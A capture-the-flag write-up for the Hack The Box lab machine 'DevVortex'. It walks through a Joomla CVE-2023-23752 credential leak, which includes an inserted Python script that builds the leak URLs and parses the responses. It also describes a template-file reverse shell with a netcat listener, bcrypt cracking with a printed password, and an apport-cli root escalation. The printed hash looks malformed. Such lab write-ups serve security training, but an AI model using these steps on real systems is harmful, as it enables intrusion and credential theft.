Hello fellow hackers, I just got bored and thought I should write something for the infosec crowd. DevVortex is a Season 3 machine from HTB rated Easy. In a couple of places it is not quite as easy as the rating suggests, but overall it goes down fast.
OBJECTIVE
Let's begin the pentest.
STEP 1: SCANNING
As always, we're only given an IP address (10.10.11.242), so we need to work from there and exploit the system.
Let's scan the target first.
We got 2 open ports from the first scan:
port 22 (SSH)
port 80 (web server)
From here let's move into enumeration and dissect the target.
STEP 2:ENUMERATION
Port 22 is SSH, a secure remote protocol, so we'd need credentials to get in, and we have none yet. Let's move on to the other port.
Port 80 is a web server (add the IP together with the devvortex.htb hostname to your /etc/hosts).
If we browse to the domain we get this:
Okay, let's move on and check for any interesting directories.
I didn't find anything interesting on this domain, so I decided to enumerate subdomains and see if I could find anything to cook and roast.
And I found an old subdomain to dance with, dev.devvortex.htb. Let's add it to /etc/hosts too and see what we can find there, maybe some juicy information.
Whenever I see a new subdomain the first things I check are robots.txt and the page source.
robots.txt has some juicy information, so let's check it out. The page source had nothing interesting.
STEP 3:FOOTHOLDING
They are using Joomla as their CMS (for more information about Joomla, check out the link).
After struggling here and there with every directory, I got to the administrator directory, which was the most interesting one for me.
It's the administrator login page, but so far we have no user credentials. I got stuck (default creds didn't work here), so I decided to take a break first.
I was stuck again because I didn't have the Joomla version; with that I could at least google for an exploit. So I fired up the terminal, ran gobuster for directories again, and finally found README.txt.
Now we've got some juice (Joomla 4.x). If you google it you'll find that this version range is vulnerable to an unauthenticated information disclosure, CVE-2023-23752: on Joomla 4.0.0 through 4.2.7 the REST API at /api/index.php/v1/config/application leaks the configuration.php values, including the database credentials, without any login. One caveat: README.txt only names the branch (4.2), not the patch level, so 4.2.7 and the fixed 4.2.8 look the same there; administrator/manifests/files/joomla.xml gives the exact version if you want to be sure before firing the exploit.
STEP 4:EXPLOITATION
Download the exploit from Exploit-DB (EDB-ID 51334, a Ruby script, so the file is 51334.rb, not .py) and run it:
command: ruby 51334.rb http://dev.devvortex.htb
OUTPUT
And we got the juicy database information, plus the site's user list:
user1: lewis (administrator)
user2: logan (regular user; this is the account we later use over SSH)
Now that we finally have creds after a long wait, let's try to log in to the administrator panel as lewis.
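To make the two enumeration steps above concrete, here is an added Python example (not the Exploit-DB script and not the author's code) that models what the CVE-2023-23752 exploit does offline: it pulls the version out of README.txt-style text, says whether the CVE range applies (and flags the branch-only ambiguity), builds the two leaking API URLs, and flattens the JSON the endpoints return into the database credentials and user list. The README text and both JSON bodies below are constructed samples with made-up values, laid out in the shape of the real responses; only the `fetch()` helper touches the network, and it is not called in the sample run.

```python
"""Offline model of the Joomla CVE-2023-23752 check used on this box.
All sample data below is constructed, not captured from the target."""
import json
import re
import urllib.request
from typing import Optional, Tuple

# CVE-2023-23752: Joomla 4.0.0 through 4.2.7 serve these REST endpoints to
# anyone, because the public=true parameter bypasses the API access check.
CONFIG_ENDPOINT = "/api/index.php/v1/config/application?public=true"
USERS_ENDPOINT = "/api/index.php/v1/users?public=true"
VULN_MIN = (4, 0, 0)
VULN_MAX = (4, 2, 7)

VERSION_RE = re.compile(r"Joomla!\s+v?(\d+)\.(\d+)(?:\.(\d+))?")


def parse_joomla_version(text: str) -> Optional[Tuple[int, int, Optional[int]]]:
    """Pull 'major.minor[.patch]' out of README.txt-style text.
    README.txt usually names only the branch (e.g. 4.2), so patch may be None."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch = m.group(1), m.group(2), m.group(3)
    return (int(major), int(minor), int(patch) if patch is not None else None)


def version_verdict(version: Tuple[int, int, Optional[int]]) -> str:
    """Decide whether CVE-2023-23752 applies. A branch-only version is only a
    'possibly': 4.2.7 (vulnerable) and 4.2.8 (fixed) both read 'Joomla! 4.2'."""
    major, minor, patch = version
    if patch is None:
        if VULN_MIN[:2] <= (major, minor) <= VULN_MAX[:2]:
            return "possibly vulnerable (patch level unknown, confirm via the API)"
        return "not vulnerable"
    if VULN_MIN <= (major, minor, patch) <= VULN_MAX:
        return "vulnerable"
    return "not vulnerable"


def leak_urls(base: str) -> Tuple[str, str]:
    """Both unauthenticated endpoints for a base URL such as http://dev.devvortex.htb."""
    base = base.rstrip("/")
    return base + CONFIG_ENDPOINT, base + USERS_ENDPOINT


def parse_config_leak(body: str) -> dict:
    """The config endpoint returns one attribute per 'data' item; flatten the
    database-relevant ones into a single dict."""
    wanted = {"dbtype", "host", "user", "password", "db", "dbprefix"}
    found = {}
    for item in json.loads(body).get("data", []):
        for key, value in item.get("attributes", {}).items():
            if key in wanted:
                found[key] = value
    return found


def parse_users_leak(body: str) -> list:
    """Return (username, group_names) pairs from the users endpoint."""
    users = []
    for item in json.loads(body).get("data", []):
        attrs = item.get("attributes", {})
        users.append((attrs.get("username"), attrs.get("group_names", "")))
    return users


def fetch(url: str, timeout: float = 10) -> str:
    """Plain GET; only needed when pointing the functions at a live target."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# ---- constructed sample input: shape of the real responses, values made up ----
SAMPLE_README = "Joomla! CMS\n...\n* This is a Joomla! 4.2 installation/upgrade package.\n"
SAMPLE_CONFIG = json.dumps({"data": [
    {"type": "application", "id": 224, "attributes": {"offline": False}},
    {"type": "application", "id": 224, "attributes": {"dbtype": "mysqli"}},
    {"type": "application", "id": 224, "attributes": {"host": "localhost"}},
    {"type": "application", "id": 224, "attributes": {"user": "lewis"}},
    {"type": "application", "id": 224, "attributes": {"password": "not-the-real-one"}},
    {"type": "application", "id": 224, "attributes": {"db": "joomla"}},
    {"type": "application", "id": 224, "attributes": {"dbprefix": "sd4fg_"}},
]})
SAMPLE_USERS = json.dumps({"data": [
    {"type": "users", "id": 649, "attributes": {"username": "lewis", "group_names": "Super Users"}},
    {"type": "users", "id": 650, "attributes": {"username": "logan", "group_names": "Registered"}},
]})

if __name__ == "__main__":
    ver = parse_joomla_version(SAMPLE_README)
    print("version:", ver, "->", version_verdict(ver))
    print("urls:", leak_urls("http://dev.devvortex.htb"))
    print("db config:", parse_config_leak(SAMPLE_CONFIG))
    print("users:", parse_users_leak(SAMPLE_USERS))
```

Against a live target you would replace the two `SAMPLE_*` bodies with `fetch(url)` for each URL from `leak_urls()`. The `dbprefix` value is worth keeping: it is the `sd4fg_` prefix you need later to name the users table in MySQL.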
After moving around the admin panel, I found the template editor, where I can edit a PHP file, drop in a backdoor, and get a shell.
Let's edit error.php in the Cassiopeia template: paste your PHP reverse shell payload into it and save.
Now set up a netcat listener in your terminal and trigger the payload by requesting /templates/cassiopeia/error.php.
And now we've got the reverse shell.
Let's stabilise the shell into something interactive.
Let's see what users exist on this system (file: /etc/passwd).
There are two users with an interactive shell: root and logan. Jumping straight to root is unrealistic, so let's start with logan.
If we run netstat -l, we'll see a MySQL port listening (33060, which is the MySQL X Protocol port; the classic client port is 3306). To confirm the MySQL creds, they are stored in plaintext in /var/www/dev.devvortex/configuration.php.
mysql creds:
mysql_user:lewis
mysql_password:REDACTED
Let's log in to the MySQL server and dump some user data.
Once we have access to MySQL, we can dump the sd4fg_users table from the joomla database (sd4fg_ is the dbprefix from configuration.php).
After dumping sd4fg_users you'll get the following output:
Now let's crack logan's hash, since he's the one with SSH access and that's the remote access we need. The hashes are bcrypt ($2y$), so use john with --format=bcrypt or hashcat with -m 3200.
username:logan
hash:$2yIT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
cracked_hash:tequieromucho
Now we can log in via SSH:
username:logan@devvortex.htb
password:tequieromucho
STEP 5:PRIVILEGE ESCALATION
Privilege escalation was simple.
command: sudo -l
After googling I found this PoC useful (link).
Reading the referenced article, the binary in question is apport-cli, which sudo -l shows logan can run as root: it collects data from crashed processes and compiles a problem report in /var/crash/.
The bug (CVE-2023-1326) is that apport-cli opens the report in a pager (less) with the root privileges it was run with, and less lets you spawn a shell with !. So to abuse it we point the binary at a crash file of our choice with -c, choose V (view report) when prompted, and inside the pager run !sh to drop into a root shell.
I just specified a file named pewpew.log using the -c option.
And finally we got root by abusing the binary.
HACK THE PLANET GUYS(By alienkeric AKA alienX)
If you have any questions, ping me here:
Twitter AKA X